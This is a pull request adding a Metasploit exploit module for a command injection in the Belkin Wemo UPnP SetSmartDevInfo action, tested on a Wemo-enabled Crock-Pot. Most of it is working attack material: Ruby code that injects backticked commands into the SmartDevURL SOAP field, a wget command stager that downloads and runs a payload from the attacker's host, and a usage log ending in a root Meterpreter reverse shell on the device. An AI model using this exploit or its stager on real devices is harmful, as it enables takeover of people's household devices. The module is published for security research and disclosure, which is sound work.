### PR TITLE
Add Belkin Wemo UPnP RCE (tested on Crock-Pot)

### DIFF
--- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
+++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
@@ -15,8 +15,8 @@ You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
 ```
 Id  Name
 --  ----
-0   Crock-Pot (Unix In-Memory)
-1   Crock-Pot (Linux Dropper)
+0   Unix In-Memory
+1   Linux Dropper
 ```
 
 ## Options
@@ -32,7 +32,7 @@ for Crock-Pot and 49153 for other devices.
 msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
 
 [*] Started reverse TCP handler on 10.22.22.4:4444
-[+] Wemo-enabled Crock-Pot detected
+[+] Wemo-enabled device detected
 [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]

--- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
+++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
@@ -1,0 +1,56 @@
+## Intro
+
+This module exploits a command injection in the Belkin Wemo UPnP API via
+the `SmartDevURL` argument to the `SetSmartDevInfo` action.
+
+This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
+devices are known to be affected, albeit on a different `RPORT` (49153).
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Crock-Pot (Unix In-Memory)
+1   Crock-Pot (Linux Dropper)
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Wemo device's UPnP port. In our testing, this was 49152
+for Crock-Pot and 49153 for other devices.
+
+## Usage
+
+```
+msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
+
+[*] Started reverse TCP handler on 10.22.22.4:4444
+[+] Wemo-enabled Crock-Pot detected
+[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
+[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
+[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
+[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
+[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
+[*] Sending payload to 10.22.22.1 (Wget)
+[*] Transmitting intermediate stager...(164 bytes)
+[*] Sending stage (1252312 bytes) to 10.22.22.1
+[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 10.22.22.1
+OS           :  (Linux 2.6.21)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter >
+```

--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'               => 'Belkin Wemo UPnP Remote Code Execution',
+      'Description'        => %q{
+        This module exploits a command injection in the Belkin Wemo UPnP API via
+        the SmartDevURL argument to the SetSmartDevInfo action.
+
+        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
+        devices are known to be affected, albeit on a different RPORT (49153).
+      },
+      'Author'             => [
+        'phikshun', # Discovery, UFuzz, and modules
+        'wvu'       # Crock-Pot testing and module
+      ],
+      'References'         => [
+        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
+        ['URL', 'https://github.com/phikshun/ufuzz'],
+        ['URL', 'https://gist.github.com/phikshun/10900566'],
+        ['URL', 'https://gist.github.com/phikshun/9984624'],
+        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
+        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
+        ['URL', 'http://www.wemo.com/']
+      ],
+      'DisclosureDate'     => '2014-04-04',
+      'License'            => MSF_LICENSE,
+      'Platform'           => ['unix', 'linux'],
+      'Arch'               => [ARCH_CMD, ARCH_MIPSLE],
+      'Privileged'         => true,
+      'Targets'            => [
+        ['Crock-Pot (Unix In-Memory)',
+          'Platform'       => 'unix',
+          'Arch'           => ARCH_CMD,
+          'Type'           => :unix_memory,
+          'DefaultOptions' => {
+            'RPORT'        => 49152,
+            'PAYLOAD'      => 'cmd/unix/bind_busybox_telnetd'
+          }
+        ],
+        ['Crock-Pot (Linux Dropper)',
+          'Platform'       => 'linux',
+          'Arch'           => ARCH_MIPSLE,
+          'Type'           => :linux_dropper,
+          'DefaultOptions' => {
+            'RPORT'        => 49152,
+            'PAYLOAD'      => 'linux/mipsle/meterpreter_reverse_tcp'
+          }
+        ]
+      ],
+      'DefaultTarget'      => 1,
+      'Notes'              => {
+        'Stability'        => [CRASH_SAFE],
+        'SideEffects'      => [ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      Opt::RPORT(49152)
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [true, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/setup.xml'
+    )
+
+    if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
+      case res.body
+      when /urn:Belkin:device:crockpot:1/
+        vprint_good('Wemo-enabled Crock-Pot detected')
+        return CheckCode::Appears
+      end
+
+      vprint_status('Wemo device detected, but it is not a target')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    checkcode = check
+
+    unless checkcode == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      cmdstager = generate_cmdstager(
+        flavor:   'wget',
+        temp:     datastore['WritableDir'],
+        file:     File.basename(cmdstager_path),
+        noconcat: true
+      )
+
+      # HACK: "chmod +x"
+      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
+      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
+      cmdstager = cmdstager.join(';')
+
+      vprint_status("Regenerated command stager: #{cmdstager}")
+      execute_command(cmdstager)
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi(
+      'method'       => 'POST',
+      'uri'          => '/upnp/control/basicevent1',
+      'ctype'        => 'text/xml',
+      'headers'      => {
+        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
+      },
+      'data'         => generate_soap_xml(cmd)
+    )
+  end
+
+  def generate_soap_xml(cmd)
+    <<EOF
+<?xml version="1.0" encoding="utf-8"?>
+<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+  <s:Body>
+    <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
+      <SmartDevURL>`#{cmd}`</SmartDevURL>
+    </u:SetSmartDevInfo>
+  </s:Body>
+</s:Envelope>
+EOF
+  end
+
+  def cmdstager_path
+    @cmdstager_path ||=
+      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
+  end
+
+end

--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -39,21 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'               => [ARCH_CMD, ARCH_MIPSLE],
       'Privileged'         => true,
       'Targets'            => [
-        ['Crock-Pot (Unix In-Memory)',
+        ['Unix In-Memory',
           'Platform'       => 'unix',
           'Arch'           => ARCH_CMD,
           'Type'           => :unix_memory,
           'DefaultOptions' => {
-            'RPORT'        => 49152,
             'PAYLOAD'      => 'cmd/unix/bind_busybox_telnetd'
           }
         ],
-        ['Crock-Pot (Linux Dropper)',
+        ['Linux Dropper',
           'Platform'       => 'linux',
           'Arch'           => ARCH_MIPSLE,
           'Type'           => :linux_dropper,
           'DefaultOptions' => {
-            'RPORT'        => 49152,
             'PAYLOAD'      => 'linux/mipsle/meterpreter_reverse_tcp'
           }
         ]
@@ -82,14 +80,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
-      case res.body
-      when /urn:Belkin:device:crockpot:1/
-        vprint_good('Wemo-enabled Crock-Pot detected')
-        return CheckCode::Appears
-      end
-
-      vprint_status('Wemo device detected, but it is not a target')
-      return CheckCode::Detected
+      vprint_good('Wemo-enabled device detected')
+      return CheckCode::Appears
     end
 
     CheckCode::Safe

--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Arch'           => ARCH_CMD,
           'Type'           => :unix_memory,
           'DefaultOptions' => {
-            'PAYLOAD'      => 'cmd/unix/bind_busybox_telnetd'
+            'PAYLOAD'      => 'cmd/unix/generic'
           }
         ],
         ['Linux Dropper',


### PR DESCRIPTION
[Version fragmentation](https://en.wikipedia.org/wiki/Market_fragmentation#Version_fragmentation) frequently means that consumers are buying vulnerable IoT devices even if vulnerabilities have been disclosed and patched.

This is precisely what happened to us when we bought a new [Wemo-enabled Crock-Pot](https://www.crock-pot.com/wemo-landing-page.html) from [Amazon](https://www.amazon.com/dp/B00IPEO02C/).

Through fuzzing and community research, we discovered that the Crock-Pot we purchased is vulnerable to a **command injection vulnerability** in its UPnP implementation... that was [discovered](https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/) by @phikshun in 2014 and [patched](https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/) by Belkin in 2015.

Consumers buying new IoT devices should be aware that their new devices aren't necessarily running new software. Patch early and patch often!

```
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > info

       Name: Belkin Wemo UPnP Remote Code Execution
     Module: exploit/linux/upnp/belkin_wemo_upnp_exec
   Platform: Unix, Linux
       Arch: cmd, mipsle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-04-04

Provided by:
  phikshun
  wvu <wvu@metasploit.com>

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Available targets:
  Id  Name
  --  ----
  0   Unix In-Memory
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target address range or CIDR identifier
  RPORT    49152            yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module exploits a command injection in the Belkin Wemo UPnP API
  via the SmartDevURL argument to the SetSmartDevInfo action. This
  module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
  devices are known to be affected, albeit on a different RPORT
  (49153).

References:
  CVE: Not available
  https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/
  https://github.com/phikshun/ufuzz
  https://gist.github.com/phikshun/10900566
  https://gist.github.com/phikshun/9984624
  https://www.crock-pot.com/wemo-landing-page.html
  https://www.belkin.com/us/support-article?articleNum=101177
  http://www.wemo.com/

msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) >
```

Thank you to @phikshun for the original research and [UFuzz](https://github.com/phikshun/ufuzz), which a friend and I hope to maintain and use in continued work!

See #10731 for the Crock-Pot remote control.